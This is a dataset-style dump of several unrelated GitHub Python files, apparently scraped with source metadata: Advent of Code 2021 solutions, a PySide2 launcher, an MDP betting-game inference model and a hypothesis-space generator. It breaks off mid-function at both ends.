self.n = n
class UCT_Model(object):
def __init__(self, init_w=0.5, init_n=1):
self.nodes = collections.defaultdict(lambda: UCT_Model_Node(init_w,init_n))
def evaluate_and_select(self, moves, using_ucb=True, c=1.414):
'''
params:
nodes: List
return:
the node who has the max ucb value
'''
nodes = [self.nodes[move] for move in moves]
N = sum(node.n for node in nodes)
if not using_ucb:
win_rates = [node.win*1.0/node.n for node in nodes]
index = win_rates.index(max(win_rates))
return moves[index]
ucb_vals =[self._ucb(node.win, node.n, N, c) for node in nodes]
total_val = sum(ucb_vals)
p = [v*1.0/total_val for v in ucb_vals]
index = ucb_vals.index(max(ucb_vals))
return moves[index]
def update(self, node, res):
node.win += res
node.n += 1
def _ucb(self, win, n, N, c):
return win * 1.0 / n + c * ((np.log(N)/n) ** 0.5) + 10 * (n<=5)
def reset(self):
self.nodes.clear()
``` |
{
"source": "JoeyGaojingxing/QtLearn",
"score": 2
} |
#### File: JoeyGaojingxing/QtLearn/start.py
```python
import sys
from PySide2 import QtCore, QtGui
from PySide2.QtWidgets import QMainWindow, QApplication, QWidget
from UI.ui_main import Ui_MainWindow
from app import JosephusCircleWindow, NinePatchWindow, AStarWindow
"""
beauty the GUI, such as backgrounds, layouts, window icon.
TODO: add global error handling, raise warnings when raise a error
"""
try:
# Python v2.
unicode
def encode_utf8(ba):
return unicode(ba, encoding='utf8')
def decode_utf8(qs):
return QtCore.QByteArray(str(qs))
except NameError:
# Python v3.
def encode_utf8(ba):
return str(ba.data(), encoding='utf8')
def decode_utf8(qs):
return QtCore.QByteArray(bytes(qs, encoding='utf8'))
class MainWindow(QMainWindow, Ui_MainWindow):
def __init__(self):
QMainWindow.__init__(self)
self.setupUi(self)
self.JosephusCircleButton.clicked.connect(self.click_josephus_circle)
self.josephus_circle = JosephusCircleWindow(self)
self.NinePatchButton.clicked.connect(self.click_nine_patch)
self.nine_patch = NinePatchWindow(self)
self.AStarButton.clicked.connect(self.click_a_star)
self.a_star = AStarWindow(self)
@QtCore.Slot()
def click_a_star(self):
self.a_star.setStyleSheet(open(r"UI\base.qss", "r", encoding='utf-8').read())
self.a_star.show()
self.hide()
@QtCore.Slot()
def click_josephus_circle(self):
self.josephus_circle.setStyleSheet(open(r"UI\base.qss", "r", encoding='utf-8').read())
self.josephus_circle.show()
self.hide()
@QtCore.Slot()
def click_nine_patch(self):
self.nine_patch.setStyleSheet(open(r"UI\base.qss", "r", encoding='utf-8').read())
self.nine_patch.show()
self.hide()
if __name__ == '__main__':
app = QApplication(sys.argv)
window = MainWindow()
window.setStyleSheet(open(r"UI\base.qss", "r", encoding='utf-8').read())
try:
window.show()
sys.exit(app.exec_())
except:
pass
``` |
{
"source": "joeygibson/adventofcode2021",
"score": 3
} |
#### File: adventofcode2021/day02/main.py
```python
import sys
from functools import reduce
from typing import Callable
def partition(lst: list[str], pred: Callable[[str], bool]) -> (list[str], list[str]):
return reduce(lambda x, y: x[pred(y)].append(y) or x, lst, ([], []))
def part1(lst: list) -> int:
horiz_ops, vert_ops = partition(lst, lambda x: x[0] != 'forward')
print(f'h: {horiz_ops}')
print(f'v: {vert_ops}')
horizontal = sum([int(x[1]) for x in horiz_ops])
vertical = sum([int(x[1]) if x[0] == 'down' else -int(x[1]) for x in vert_ops])
return horizontal * vertical
def part2(lst: list) -> int:
pos = 0
depth = 0
aim = 0
for op, val in lst:
val = int(val)
if op == 'forward':
pos += val
depth += aim * val
elif op == 'up':
aim -= val
else:
aim += val
return depth * pos
def get_data(path):
with open(path) as f:
return [x.strip().split() for x in f.readlines() if x.strip()]
if __name__ == '__main__':
if len(sys.argv) == 1:
print('Usage: main.py #')
sys.exit(1)
lines = get_data(sys.argv[1])
r1 = part1(lines)
r2 = part2(lines)
print(f'part 1: {r1}')
print(f'part 2: {r2}')
```
#### File: adventofcode2021/day05/main.py
```python
import itertools
import sys
def find_clouds(lst: list) -> int:
xs = [int(x[0][0]) for x in lst] + [int(x[1][0]) for x in lst]
max_x = max(xs)
ys = [int(x[0][1]) for x in lst] + [int(x[1][1]) for x in lst]
max_y = max(ys)
sea_map = {}
for x in range(0, max_x + 1):
for y in range(0, max_y + 1):
sea_map[(x, y)] = '.'
for a, b in lst:
x_step = 1 if a[0] < b[0] else -1
y_step = 1 if a[1] < b[1] else -1
if a[0] == b[0]:
fill_value = a[0]
elif a[1] == b[1]:
fill_value = a[1]
else:
fill_value = None
co = itertools.zip_longest(range(a[0], b[0] + x_step, x_step), range(a[1], b[1] + y_step, y_step),
fillvalue=fill_value)
for pair in co:
if sea_map[pair] == '.':
sea_map[pair] = 1
else:
sea_map[pair] += 1
return len(list(filter(lambda v: v != '.' and v > 1, sea_map.values())))
def get_data(path) -> list:
with open(path) as f:
raw = [x.strip().split(' -> ') for x in f.readlines() if x.strip()]
return [[list(map(int, x[0].split(','))), list(map(int, x[1].split(',')))] for x in raw]
if __name__ == '__main__':
if len(sys.argv) == 1:
print('Usage: main.py #')
sys.exit(1)
lines = get_data(sys.argv[1])
r1 = find_clouds(list(filter(lambda x: x[0][0] == x[1][0] or x[0][1] == x[1][1], lines)))
r2 = find_clouds(lines)
print(f'part 1: {r1}')
print(f'part 2: {r2}')
```
#### File: adventofcode2021/day07/main.py
```python
import sys
from functools import reduce
def get_data(path) -> list:
with open(path) as f:
return [int(x) for x in f.read().strip().split(',')]
def part1(lst: list[int]) -> int:
least_fuel = sys.maxsize
for pos in lst:
fuel = reduce(lambda acc, x: acc + abs(x - pos), lst, 0)
if fuel < least_fuel:
least_fuel = fuel
return least_fuel
def part2(lst: list[int]) -> int:
least_fuel = sys.maxsize
for pos in range(0, max(lst)):
fuel = reduce(lambda acc, x: acc + step_mul(abs(x - pos)), lst, 0)
if fuel < least_fuel:
least_fuel = fuel
return least_fuel
def step_mul(steps: int) -> int:
return int((steps ** 2 + steps) / 2)
if __name__ == '__main__':
if len(sys.argv) < 2:
print('Usage: main.py #')
sys.exit(1)
file_name = sys.argv[1]
print(f'part 1: {part1(get_data(file_name))}')
print(f'part 2: {part2(get_data(file_name))}')
```
#### File: adventofcode2021/day09/main.py
```python
import functools
import itertools
import sys
from typing import Tuple
def is_low_point(sea_floor_map: dict, point: Tuple[int, int]) -> bool:
point_depth = sea_floor_map[point]
x, y = point
neighbors = [(x - 1, y), (x + 1, y), (x, y - 1), (x, y + 1)]
depths = [sea_floor_map.get(n) for n in neighbors]
valid_depths = list(filter(lambda d: d is not None, depths))
low_points = list(filter(lambda d: d <= point_depth, valid_depths))
return len(low_points) == 0
def part1(sea_floor_map: dict) -> int:
low_points = []
for k, v in sea_floor_map.items():
if is_low_point(sea_floor_map, k):
low_points.append(v)
return sum([x + 1 for x in low_points])
# , width: int, height: int
def get_neighbors(point: Tuple) -> list[Tuple]:
x, y = point
# return [(x - 1, y), (x + 1, y), (x, y - 1), (x, y + 1)]
return [(x, y - 1), (x - 1, y), (x, y + 1), (x + 1, y)]
# return list(filter(lambda p: 0 <= p[0] <= width and 0 <= p[1] <= height, tmp))
def filter_not_nines(sea_floor_map: dict, points: list[Tuple]) -> list[Tuple]:
return list(set([p for p in points if sea_floor_map.get(p) is not None and sea_floor_map.get(p) != 9]))
# def part2(sea_floor_map: dict) -> int:
# basins = []
# max_pos = max(sea_floor_map.keys())
#
# for point in [x[0] for x in sea_floor_map.items() if x[1] != 9]:
# neighbors = filter_not_nines(sea_floor_map, get_neighbors(point, *max_pos))
# added = False
#
# for basin in basins:
# if any([x in basin for x in neighbors]):
# added = True
# basin.append(point)
# break
#
# if not added:
# n2 = filter_not_nines(sea_floor_map,
# list(itertools.chain(*[get_neighbors(n, *max_pos) for n in neighbors])))
#
# for basin in basins:
# if any([x in basin for x in n2]):
# added = True
# basin.append(point)
# break
#
# if not added:
# basins.append([point])
#
# for basin in basins:
# print(basin)
#
# print(f'basins count {len(basins)}')
#
# sizes = list(reversed(sorted([len(basin) for basin in basins])))
# print(f'sizes: {sizes}')
# print(f'picks: {sizes[0:3]}')
# return functools.reduce(lambda acc, n: acc * n, sizes[0:3], 1)
def part2(sea_floor_map: dict) -> int:
big_basins = [0, 0, 0]
for key in list(sea_floor_map.keys()):
point = sea_floor_map.get(key)
tmp = explore(sea_floor_map, point)
basin = len(set(tmp))
if big_basins[0] < basin:
big_basins = big_basins[1:3]
big_basins.append(basin)
big_basins = sorted(big_basins)
print(f'big_basins {big_basins}')
return functools.reduce(lambda acc, n: acc * n, big_basins, 1)
def explore(filtered_map, point, basin=[]) -> list:
if point is None:
return basin
del filtered_map[point]
basin.append(point)
res = [explore(filtered_map, filtered_map.get(n), basin) for n in get_neighbors(point)]
return list(itertools.chain(*res))
def get_data(path) -> dict:
data = {}
with open(path) as f:
lines = [x.strip() for x in f.readlines() if x.strip()]
for i, row in enumerate(lines):
for j, val in enumerate(row):
if val != '9':
data[(j, i)] = (j, i)
# data[(j, i)] = int(val)
return data
if __name__ == '__main__':
if len(sys.argv) < 2:
print('Usage: main.py #')
sys.exit(1)
file_name = sys.argv[1]
data = get_data(file_name)
print(data)
# print(f'part 1: {part1(get_data(file_name))}')
print(f'part 2: {part2(get_data(file_name))}')
```
#### File: adventofcode2021/day12/main.py
```python
import sys
from collections import Counter
class Cave:
def __init__(self, name: str):
self.name = name.upper() if name in ['start', 'end'] else name
self.links = {}
def __str__(self):
return f'{self.name}'
def __repr__(self):
return self.__str__()
def __eq__(self, other):
return self.name == other.name
def __hash__(self):
return self.name.__hash__()
def add(self, other: 'Cave'):
self.links[other] = other
def is_start(self) -> bool:
return self.name == 'START'
def is_end(self) -> bool:
return self.name == 'END'
def is_small(self) -> bool:
return self.name.islower()
def get_data(path) -> Cave:
with open(path) as f:
lines = [x.strip() for x in f.readlines() if x.strip()]
caves = {}
start = None
for a, b in [x.split('-') for x in lines]:
if a not in caves:
a_cave = Cave(a)
if a == 'start':
start = a_cave
else:
a_cave = caves[a]
if b not in caves:
b_cave = Cave(b)
if b == 'start':
start = b_cave
else:
b_cave = caves[b]
a_cave.add(b_cave)
b_cave.add(a_cave)
caves[a] = a_cave
caves[b] = b_cave
return start
def part1(start: Cave) -> int:
return len(walk(start, [start], False))
def part2(start: Cave) -> int:
return len(walk(start, [start], True))
def walk(start_at: Cave, path: list[Cave], allow_multiple: bool) -> list[list[Cave]]:
if start_at.is_end():
return [path]
paths = []
for cave in start_at.links:
if cave.is_start():
continue
if cave.is_small() and cave in path:
if allow_multiple:
small_counts = Counter(list(filter(lambda x: x.is_small(), path)))
multiple_small_visits = any([c > 1 for c in small_counts.values()])
if multiple_small_visits:
continue
else:
continue
tmp_path = list([x for x in path])
tmp_path.append(cave)
paths += walk(cave, tmp_path, allow_multiple)
return paths
if __name__ == '__main__':
if len(sys.argv) < 2:
print('Usage: main.py #')
sys.exit(1)
file_name = sys.argv[1]
print(f'part1 {part1(get_data(file_name))}')
print(f'part2 {part2(get_data(file_name))}')
```
#### File: adventofcode2021/day14/main.py
```python
import itertools
import sys
from collections import Counter, defaultdict
from typing import Tuple
def get_data(path) -> (list[str], dict[str, str]):
with open(path) as f:
lines = f.readlines()
template = [c for c in lines[0].strip()]
rules = {}
for line in itertools.dropwhile(lambda x: '->' not in x, lines):
splits = line.strip().split(' -> ')
rules[splits[0].strip()] = splits[1].strip()
return template, rules
def partition(lst: list, n: int) -> Tuple:
for i in range(0, len(lst) - 1):
a = lst[i]
b = lst[i + 1]
yield a, b
def combine(template: list[str], rules: dict[str, str], iterations: int = 10) -> int:
pairs = Counter()
for pair in partition(template, 1):
pairs[pair] = 1
for i in range(iterations):
print(f'iteration {i + 1}')
next_pairs = Counter()
for (a, b), tally in pairs.items():
i = rules[''.join([a, b])]
next_pairs[(a, i)] += tally
next_pairs[(i, b)] += tally
pairs = next_pairs
totals = defaultdict(lambda: 0)
for (a, b), tally in pairs.items():
totals[a] += tally
totals[template[-1]] += 1
min_val = min(totals.values())
max_val = max(totals.values())
return max_val - min_val
def part1(template: list[str], rules: dict[str, str]) -> int:
return combine(template, rules)
def part2(template: list[str], rules: dict[str, str]) -> int:
return combine(template, rules, 40)
if __name__ == '__main__':
if len(sys.argv) < 2:
print('Usage: main.py #')
sys.exit(1)
file_name = sys.argv[1]
print(f'part1 {part1(*get_data(file_name))}')
print()
print(f'part2 {part2(*get_data(file_name))}')
```
#### File: adventofcode2021/day15/main.py
```python
import sys
from collections import defaultdict
from copy import deepcopy
from typing import Tuple, Dict
Pair = Tuple[int, int]
class Graph:
def __init__(self, the_map):
self.nodes = set()
self.distances = the_map
def addNode(self, value):
self.nodes.add(value)
def edges(self, node):
x, y = node
neighbors = [(x, y + 1), (x + 1, y), (x, y - 1), (x - 1, y)]
return [n for n in neighbors if self.distances.get(n) is not None]
def get_data(path) -> dict[Pair, int]:
with open(path) as f:
lines = f.readlines()
the_map = {}
for j, row in enumerate(lines):
for i, val in enumerate(row.strip()):
the_map[(i, j)] = int(val)
return the_map
def get_exploded_data(path) -> Dict[Pair, int]:
with open(path) as f:
lines = [line.strip() for line in f.readlines() if line.strip()]
cols = len(lines[0].strip())
rows = len(lines)
raw_map = [[0 for col in range(cols)] for row in range(rows)]
for j, row in enumerate(lines):
for i, val in enumerate(row.strip()):
raw_map[j][i] = int(val)
for row_num, row in enumerate(raw_map):
new_row = deepcopy(row)
current_vals = new_row
for i in range(4):
new_cols = [x + 1 if x + 1 <= 9 else 1 for x in current_vals]
new_row += new_cols
current_vals = new_cols
raw_map[row_num] = new_row
new_map = deepcopy(raw_map)
current_map = deepcopy(new_map)
for i in range(4):
tmp_map = []
for row in current_map:
new_row = [x + 1 if x + 1 <= 9 else 1 for x in row]
tmp_map.append(new_row)
new_map += tmp_map
current_map = tmp_map
the_map = {}
for j, row in enumerate(new_map):
for i, val in enumerate(row):
the_map[(i, j)] = val
print('map created')
return the_map
def dijkstra(graph, initial, goal):
visited = {initial: 0}
path = defaultdict(list)
nodes = set(graph.nodes)
while nodes:
minNode = None
for node in nodes:
if node in visited:
if minNode is None:
minNode = node
elif visited[node] < visited[minNode]:
minNode = node
if minNode is None:
break
nodes.remove(minNode)
currentWeight = visited[minNode]
for edge in graph.edges(minNode):
weight = currentWeight + graph.distances[edge]
if edge not in visited or weight < visited[edge]:
visited[edge] = weight
path[edge].append(minNode)
return visited[goal]
def part1(the_map: dict[Pair, int]) -> int:
g = Graph(the_map)
for node in the_map.keys():
g.addNode(node)
return dijkstra(g, min(the_map.keys()), max(the_map.keys()))
if __name__ == '__main__':
if len(sys.argv) < 2:
print('Usage: main.py #')
sys.exit(1)
file_name = sys.argv[1]
# print(f'part1 {part1(get_data(file_name))}')
print()
print(f'part2 {part1(get_exploded_data(file_name))}')
``` |
{
"source": "joeyginorio/compositional_desires",
"score": 3
} |
#### File: compositional_desires/model_src/mdp.py
```python
import matplotlib as mpl
mpl.use('Agg')
import matplotlib.pyplot as plt
import numpy as np
import random
import pyprind
from scipy.stats import beta
from scipy.stats import expon
from scipy.stats import uniform
from abc import ABCMeta
from abc import abstractmethod
class MDP(object):
"""
Defines an Markov Decision Process containing:
- States, s
- Actions, a
- Rewards, r(s,a)
- Transition Matrix, t(s,a,_s)
Includes a set of abstract methods for extended class will
need to implement.
"""
__metaclass__ = ABCMeta
def __init__(self, states=None, actions=None, rewards=None, transitions=None,
discount=.999, tau=.01, epsilon=.01):
self.s = np.array(states)
self.a = np.array(actions)
self.r = np.array(rewards)
self.t = np.array(transitions)
self.discount = discount
self.tau = tau
self.epsilon = epsilon
# Value iteration will update this
self.values = None
self.policy = None
@abstractmethod
def isTerminal(self, state):
"""
Checks if MDP is in terminal state.
"""
raise NotImplementedError()
def getTransitionStatesAndProbs(self, state, action):
"""
Returns the list of transition probabilities
"""
return self.t[state][action][:]
def getReward(self, state, action, nextState):
"""
Gets reward for transition from state->action->nextState.
"""
return self.r[state][action][nextState]
def takeAction(self, state, action):
"""
Take an action in an MDP, return the next state
Chooses according to probability distribution of state transitions,
contingent on actions.
"""
return np.random.choice(self.s, p=self.getTransitionStatesAndProbs(state, action))
def valueIteration(self):
"""
Performs value iteration to populate the values of all states in
the MDP.
Params:
- epsilon: Determines limit of convergence
"""
# Initialize V_0 to zero
self.values = np.zeros(len(self.s))
self.policy = np.zeros([len(self.s), len(self.a)])
policy_switch = 0
# Loop until convergence
while True:
# oldPolicy = np.argmax(self.policy, axis=1)
# self.extractPolicy()
# newPolicy = np.argmax(self.policy, axis=1)
# if not np.array_equal(oldPolicy, newPolicy):
# policy_switch += 1
# print "Policy switch count: {}".format(policy_switch)
# To be used for convergence check
oldValues = np.copy(self.values)
for i in range(len(self.s)-1):
self.values[i] = np.max(self.r[i] + self.discount * \
np.dot(self.t[i][:][:], self.values))
# print "Convergence Measure: {}".format(np.max(np.abs(self.values - oldValues)))
# print "-------------------------------------"
# Check Convergence
if np.max(np.abs(self.values - oldValues)) <= self.epsilon:
break
def extractPolicy(self):
"""
Extract policy from values after value iteration runs.
"""
self.policy = np.zeros([len(self.s),len(self.a)])
self.logpolicy = np.zeros([len(self.s),len(self.a)])
for i in range(len(self.s)-1):
state_policy = np.zeros(len(self.a))
state_policy = self.r[i] + self.discount* \
np.dot(self.t[i][:][:], self.values)
# Softmax the policy
# state_policy -= np.max(state_policy)
# state_policy = np.exp(state_policy / float(self.tau))
# state_policy /= state_policy.sum()
state_policy /= self.tau
maxVal = max(state_policy)
arg = maxVal + np.log((np.exp(state_policy - maxVal).sum()))
state_policy -= arg
self.logpolicy[i] = state_policy
state_policy = np.exp(state_policy)
if self.tau > 100:
state_policy = np.ones(len(state_policy))
state_policy /= len(state_policy)
self.policy[i] = state_policy
def extractDeterministicPolicy(self):
"""
Extract policy from values after value iteration runs.
"""
self.policy = np.zeros(len(self.s))
for i in range(len(self.s)-1):
# Take max over all possible actions in state
max_a = 0
for j in range(len(self.a)):
# Account for all possible states a particular action can take you to
sum_nextState = 0
for k in range(len(self.s)-1):
sum_nextState += self.getTransitionStatesAndProbs(i,j)[k] * \
(self.getReward(i,j,k) + self.discount*self.values[k])
if sum_nextState > max_a:
max_a = sum_nextState
self.policy[i] = j
def simulate(self, state):
"""
Runs the solver for the MDP, conducts value iteration, extracts policy,
then runs simulation of problem.
NOTE: Be sure to run value iteration (solve values for states) and to
extract some policy (fill in policy vector) before running simulation
"""
# Run simulation using policy until terminal condition met
while not self.isTerminal(state):
# Determine which policy to use (non-deterministic)
policy = self.policy[np.where(self.s == state)[0][0]]
p_policy = self.policy[np.where(self.s == state)[0][0]] / \
self.policy[np.where(self.s == state)[0][0]].sum()
# Get the parameters to perform one move
stateIndex = np.where(self.s == state)[0][0]
policyChoice = np.random.choice(policy, p=p_policy)
actionIndex = np.random.choice(np.array(np.where(self.policy[state][:] == policyChoice)).ravel())
# Take an action, move to next state
nextState = self.takeAction(stateIndex, actionIndex)
print "In state: {}, taking action: {}, moving to state: {}".format(
state, self.a[actionIndex], nextState)
# End game if terminal state reached
state = int(nextState)
if self.isTerminal(state):
# print "Terminal state: {} has been reached. Simulation over.".format(state)
return state
class BettingGame(MDP):
"""
Defines the Betting Game:
Problem: A gambler has the chance to make bets on the outcome of
a fair coin flip. If the coin is heads, the gambler wins as many
dollars back as was staked on that particular flip - otherwise
the money is lost. The game is won if the gambler obtains $100,
and is lost if the gambler runs out of money (has 0$). This gambler
did some research on MDPs and has decided to enlist them to assist
in determination of how much money should be bet on each turn. Your
task is to build that MDP!
Params:
startCash: Starting amount to bet with
pHead: Probability of coin flip landing on heads
- Use .5 for fair coin, else choose a bias [0,1]
"""
def __init__(self, pHeads=.5, discount=.99, epsilon=.1, tau=.001):
MDP.__init__(self,discount=discount,tau=tau,epsilon=epsilon)
self.pHeads = pHeads
self.setBettingGame(pHeads)
self.valueIteration()
self.extractPolicy()
def isTerminal(self, state):
"""
Checks if MDP is in terminal state.
"""
return True if state is 100 or state is 0 else False
def setBettingGame(self, pHeads=.5):
"""
Initializes the MDP to the starting conditions for
the betting game.
Params:
startCash = Amount of starting money to spend
pHeads = Probability that coin lands on head
- .5 for fair coin, otherwise choose bias
"""
# This is how much we're starting with
self.pHeads = pHeads
# Initialize all possible states
self.s = np.arange(102)
# Initialize possible actions
self.a = np.arange(101)
# Initialize rewards
self.r = np.zeros(101)
self.r[0] = -5
self.r[100] = 10
# Initialize transition matrix
temp = np.zeros([len(self.s),len(self.a),len(self.s)])
# List comprehension using tHelper to determine probabilities for each index
self.t = [self.tHelper(i[0], i[1], i[2], self.pHeads) for i,x in np.ndenumerate(temp)]
self.t = np.reshape(self.t, np.shape(temp))
for x in range(len(self.a)):
# Remembr to add -1 to value it, and policy extract
# Send the end game states to the death state!
self.t[100][x] = np.zeros(len(self.s))
self.t[100][x][101] = 1.0
self.t[0][x] = np.zeros(len(self.s))
self.t[0][x][101] = 1.0
def tHelper(self, x, y, z , pHeads):
"""
Helper function to be used in a list comprehension to quickly
generate the transition matrix. Encodes the necessary conditions
to compute the necessary probabilities.
Params:
x,y,z indices
pHeads = probability coin lands on heads
"""
# If you bet no money, you will always have original amount
if x + y is z and y is 0:
return 1.0
# If you bet more money than you have, no chance of any outcome
elif y > x and x is not z:
return 0
# If you bet more money than you have, returns same state with 1.0 prob.
elif y > x and x is z:
return 1.0
# Chance you lose
elif x - y is z:
return 1.0 - pHeads
# Chance you win
elif x + y is z:
return pHeads
# Edge Case: Chance you win, and winnings go over 100
elif x + y > z and z is 100:
return pHeads
else:
return 0
return 0
class InferenceMachine():
"""
Conducts inference via MDPs for the BettingGame.
"""
def __init__(self):
self.sims = list()
self.likelihood = None
self.posterior = None
self.prior = None
self.e = None
self.buildBiasEngine()
def inferSummary(self, state, action):
self.inferLikelihood(state, action)
self.inferPosterior(state, action)
print "Expected Value of Posterior Distribution: {}".format(
self.expectedPosterior())
self.plotDistributions()
def buildBiasEngine(self):
"""
Simulates MDPs with varying bias to build a bias inference engine.
"""
print "Loading MDPs...\n"
# Unnecessary progress bar for terminal
bar = pyprind.ProgBar(len(np.arange(0,1.01,.01)))
for i in np.arange(0,1.01,.01):
self.sims.append(BettingGame(i))
bar.update()
print "\nDone loading MDPs..."
def inferLikelihood(self, state, action):
"""
Uses inference engine to inferBias predicated on an agents'
actions and current state.
"""
self.state = state
self.action = action
self.likelihood = list()
for i in range(len(self.sims)):
self.likelihood.append(self.sims[i].policy[state][action])
def inferPosterior(self, state, action):
"""
Uses inference engine to compute posterior probability from the
likelihood and prior (beta distribution).
"""
# Beta Distribution
# self.prior = np.linspace(.01,1.0,101)
# self.prior = beta.pdf(self.prior,1.4,1.4)
# self.prior /= self.prior.sum()
# Shifted Exponential
# self.prior = np.zeros(101)
# for i in range(50):
# self.prior[i + 50] = i * .02
# self.prior[100] = 1.0
# self.prior = expon.pdf(self.prior)
# self.prior[0:51] = 0
# self.prior *= self.prior
# self.prior /= self.prior.sum()
# # Shifted Beta
# self.prior = np.linspace(.01,1.0,101)
# self.prior = beta.pdf(self.prior,1.2,1.2)
# self.prior /= self.prior.sum()
# self.prior[0:51] = 0
# Uniform
self.prior = np.linspace(.01,1.0,101)
self.prior = uniform.pdf(self.prior)
self.prior /= self.prior.sum()
self.prior[0:51] = 0
self.posterior = self.likelihood * self.prior
self.posterior /= self.posterior.sum()
def plotDistributions(self):
# Plotting Posterior
plt.figure(1)
plt.subplot(221)
plt.plot(np.linspace(.01,1.0,101), self.posterior)
plt.ylabel('P(Action={}|State={})'.format(self.action, self.state))
plt.xlabel('Bias')
plt.title('Posterior Probability for Bias')
# Plotting Likelihood
plt.subplot(222)
plt.plot(np.linspace(.01,1.0,101),self.likelihood)
plt.ylabel('P(Action={}|State={})'.format(self.action,self.state))
plt.xlabel('Bias')
plt.title('Likelihood for Actions, States')
# Plotting Prior
plt.subplot(223)
plt.plot(np.linspace(.01,1.0,101), self.prior)
plt.ylabel('P(Bias)')
plt.xlabel('Bias')
plt.title('Prior Probability')
plt.tight_layout()
# plt.show()
def expectedPosterior(self):
"""
Calculates expected value for the posterior distribution.
"""
expectation = 0
x = np.linspace(.01,1.0,101)
for i in range(len(self.posterior)):
expectation += self.posterior[i] * x[i]
return expectation
# infer = InferenceMachine()
"""
(.8 discount expected values)
(20,10) -> .769 | .75, .75, .9, .75, .8, .75, .7, .8 | .7749 Close
(20,5) -> .668 | .65, .625, .6, .66, .65, .63, .65, .75 | .6519 Close
(20,4) -> .607 | .60, .5725, .58, .63, .6, .6, .6, .6 | .5978 Close
(20,1) -> .591 | .5, .53125, .51, .5, .5, .5, .5, .5 | .5052 Eh
(40,5) -> .585 | .6, .5725, .65, .55, .6, .56, .5, .6 | .5791 Close
(40,10) -> .650 | .65, .625, .7, .6, .65, .63, .55, .65 | .6319 Close
(40,20) -> .777 | .75, .75, .95, .7, .8, .75, .75, .75 | .7749 Close
(40,40) -> .646 | 1.0, 1.0, 1.0, 1.0, .95, .9, 1.0, .9 | .9688 Eh
(80,1) -> .581 | .5, .515625, .51, .5, .65, .5, .5, .5 | .522 Eh
(80,5) -> .578 | .55, .53125, .55, .56, .75, .65, .5, .6 | .586 Close
(80,10) -> .605 | .6, .5725, .6, .67, .85, .75, .6, .7 | .668 Eh
(80,20) -> .683 | .65, .625, .65, .75, .95, .9, .65, .8 | .749 Eh
"""
"""
Model can't capture intuition that betting all your money means you
probably are going to win. I can modify it to capture that intuition, but
then the rest of the model breaks.
x axis - model judgement
y axis - participant judgement
"""
``` |
{
"source": "joeyginorio/CurseOfKnowledge",
"score": 4
} |
#### File: CurseOfKnowledge/src/GenerateHypothesisSpace.py
```python
import itertools
import numpy as np
class GenerateHypothesisSpace():
"""
Class which holds several hypothesis space generator functions.
"""
def __init__(self, blockList):
self.blockList = blockList
self.unorderedArgs = self.unorderedArgs(self.blockList)
self.orderedArgs = self.orderedArgs(self.blockList)
def simpleDepthSampler(self, depth, uniform):
"""
Samples AND, OR hypotheses at several depths.
"""
x = lambda x: ''.join(x) # Beautiful function to make hypotheses pretty
hypotheses = []
args = []
for i in range(1,depth+1):
args = itertools.chain(args, map(x,itertools.combinations('ABCDE',i)))
args = [[i] for i in args]
args = list(args)
y = lambda y: self.Or(*y)
for i in range(1, depth+1):
hypotheses = itertools.chain(hypotheses, map(y,
itertools.combinations('ABCDE',i)))
hypotheses = args + list(hypotheses)
# rid of duplicates
hypotheses = [tuple(i) for i in hypotheses]
hypotheses = set(hypotheses)
hypotheses = list(hypotheses)
hypotheses = [list(i) for i in hypotheses]
a = 0
if uniform:
prior = list()
prior = [1.0/len(hypotheses) for i in hypotheses]
else:
prior = list()
for h in hypotheses:
prior.append(1.0/self.priorHelp(h))
normal = sum(prior)
prior = [i/normal for i in prior]
return [hypotheses, prior, [''.join(i) for i in self.unorderedArgs]]
def depthSampler(self, depth, size, uniform=True):
"""
Samples AND, OR hypotheses at several depths.
"""
x = lambda x: ''.join(x) # Beautiful function to make hypotheses pretty
hypotheses = []
args = []
for i in range(1,depth+1):
args = itertools.chain(args, itertools.imap(x,itertools.combinations('ABCDE',i)))
args = list(args)
y = lambda y: self.Or(*y)
for i in range(1, depth+1):
hypotheses = itertools.chain(hypotheses, itertools.imap(y,
itertools.combinations(args,i)))
hypotheses = list(hypotheses)
hypotheses = [i for i in hypotheses if self.max_len(i) <= size]
hypotheses = [i for i in hypotheses if self.total_len(i) <= depth]
if uniform:
prior = list()
prior = [1.0/len(hypotheses) for i in hypotheses]
else:
prior = list()
for h in hypotheses:
prior.append(1.0/self.priorHelp(h))
normal = sum(prior)
prior = [i/(5+normal) for i in prior]
return [hypotheses, prior, [''.join(i) for i in self.unorderedArgs]]
"""
Same thing as depthSampler, except you first specify how many samples
you want from the hypothesis space depthSampler gives.
"""
def random_depth_sampler(self, samples, depth, uniform=True, th = ['BE']):
temp = self.depthSampler(depth,uniform)
hyps = temp[0]
arg = temp[2]
if len(hyps) < samples:
print 'Desired sample size is larger than total hypothesis space, choose larger depth'
return None
final_hyps = list()
final_hyps.append(th)
for i in range(samples-1):
ind = np.random.choice(len(hyps))
while hyps[ind] == th:
ind = np.random.choice(len(hyps))
temp = hyps.pop(ind)
final_hyps.append(temp)
if uniform:
prior = list()
prior = [1.0/len(final_hyps) for i in final_hyps]
np.random.shuffle(final_hyps)
return [final_hyps, prior, arg]
def random_teacher(self, num_examples):
temp = self.depthSampler(1,uniform=True)
examples = temp[2]
return list(np.random.choice(examples,size=num_examples,replace=False))
def permute_teacher(self, teacherData):
final_teacher_data = list()
if len(teacherData) < 8:
final_teacher_data = itertools.permutations(teacherData)
final_teacher_data = [list(i) for i in final_teacher_data]
else:
temp = teacherData
perms = set()
while len(perms) < 10000:
np.random.shuffle(temp)
perms.add(tuple(temp))
final_teacher_data = list(perms)
final_teacher_data = [list(i) for i in final_teacher_data]
return final_teacher_data
def priorHelp(self, hypothesis):
total = 0
for h in hypothesis:
total += len(h)
return total
def unorderedArgs(self, blockList):
"""
Generates a list of arguments for the unordered set of hypothesis
generators. Takes a blockList, and generates every combination.
Param:
blockList - a list of characters
uniform - boolean, if true, will set prior to uniform distribution
"""
# Initialize empty action space
args = list()
args += blockList
# Generate every possible combination of arguments from blockList
for i in range(2, len(blockList)+1):
for arg in itertools.combinations(blockList, i):
args.append(list(arg))
return args
def orderedArgs(self, blockList):
"""
Generates a list of arguments for the unordered set of hypothesis
generators. Takes a blockList, and generates every combination.
Param:
blockList - a list of characters
"""
# Initialize empty action space
args = list()
args += blockList
# Generate every possible combination of arguments from blockList
for i in range(2, len(blockList)+1):
for arg in itertools.permutations(blockList, i):
args.append(list(arg))
return args
def unorderedOr(self, uniform=True):
"""
Hypothesis Space #1:
Generates a list of hypotheses, including all combinations of
Or logic rules.
Param:
uniform - if true, prior for H is uniform, else t.b.d
"""
# Initializes hypothesis space and prior
hypothesisSpace = list()
hypothesisSpacePrior = list()
